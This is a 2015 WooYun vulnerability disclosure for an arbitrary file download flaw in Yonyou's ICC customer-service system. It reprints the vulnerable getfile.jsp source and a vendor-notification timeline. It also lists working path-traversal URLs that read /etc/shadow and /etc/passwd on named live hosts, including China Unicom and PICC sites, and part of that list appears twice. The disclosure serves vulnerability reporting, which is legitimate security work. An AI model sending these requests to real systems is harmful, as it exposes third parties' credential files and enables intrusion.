乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-11: 细节已通知厂商并且等待厂商处理中 2015-01-12: 厂商已经确认,细节仅向厂商公开 2015-01-15: 细节向第三方安全合作伙伴开放 2015-03-08: 细节向核心白帽子及相关领域专家公开 2015-03-18: 细节向普通白帽子公开 2015-03-28: 细节向实习白帽子公开 2015-04-13: 细节向公众公开
任意文件下载
用友icc客户系统存在任意文件下载漏洞,漏洞文件common/getfile.jsp源码如下:<%@ page contentType="text/html;charset=UTF-8" %><%@ page import="java.io.*,com.ufida.icc.util.*,java.util.*" %><%String fullPath = "";String f="";f = request.getParameter("p");if(CommonUtil.validateParam(f)){ f = "";}f = CommonUtil.filtParam(f);if(f == null || f.equals("")){ out.print("请传入文件名。<br>"); return;}f = f.substring(f.lastIndexOf("/")+1);String extName = f.substring(f.lastIndexOf(".")+1);if(extName.equals(f)){ out.print("请传入正确的文件名,带后缀<br>"); return;}String basePath = null;String baseUrl = null;baseUrl = SystemProperties.instance().webBaseUrl;basePath = SystemProperties.instance().webUploadPath;fullPath = basePath + f;fullPath = fullPath.replace("\\","/");String fullPathFileName = fullPath.substring(fullPath.lastIndexOf("/")+1);String fullPathFile = fullPath.replace(fullPathFileName,"");File fileLoad = new File(fullPathFile, fullPathFileName);if(fileLoad.exists()){ OutputStream outp = null; FileInputStream in = null; String typeName = "application/octet-stream"; try{ outp= response.getOutputStream(); byte b[] = new byte[1024]; response.setHeader("Content-disposition", "attachment;filename=" + fullPathFileName); response.setContentType(typeName); long fileLength = fileLoad.length(); String length = String.valueOf(fileLength); response.setHeader("Content-Length", length); in = new FileInputStream(fileLoad); int n = 0; while ((n = in.read(b)) != -1) { outp.write(b, 0, n); } outp.flush(); }catch(Exception e){ out.println("下载失败:" + e.getMessage()); }finally{ if(in != null){ in.close(); in = null; } if(outp != null){ outp.close(); outp = null; out.clear(); out = pageContext.pushBody(); } }}else{ out.print("文件"+fullPathFileName+"不存在。<br>");}%>
案例:http://111.75.198.122/web/icc/chat/chat?c=1&s=1 http://111.75.198.122/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow 其他案例:中国联通在线导购客服http://help.10010.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd中国联通客服http://webservice.10010.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow人寿保险客服http://im.e-picc.com.cn/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow网维游戏客服http://icc.shunwang.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow
http://111.75.198.122/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow
其他案例:中国联通在线导购客服http://help.10010.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd中国联通客服http://webservice.10010.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow人寿保险客服http://im.e-picc.com.cn/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow网维游戏客服http://icc.shunwang.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\shadow
过滤
危害等级:中
漏洞Rank:5
确认时间:2015-01-12 09:47
多谢
暂无